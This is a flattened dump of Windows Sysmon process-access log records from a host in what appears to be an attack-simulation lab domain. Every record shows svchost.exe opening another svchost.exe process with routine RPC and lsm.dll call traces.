13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011115Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.883{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011114Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011113Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.867{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011112Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.836{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011111Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011110Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011109Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011108Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011107Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011106Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011105Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011104Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011103Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011102Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011101Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011100Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011099Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011098Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011097Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011096Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011095Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011094Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011093Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.821{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011092Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 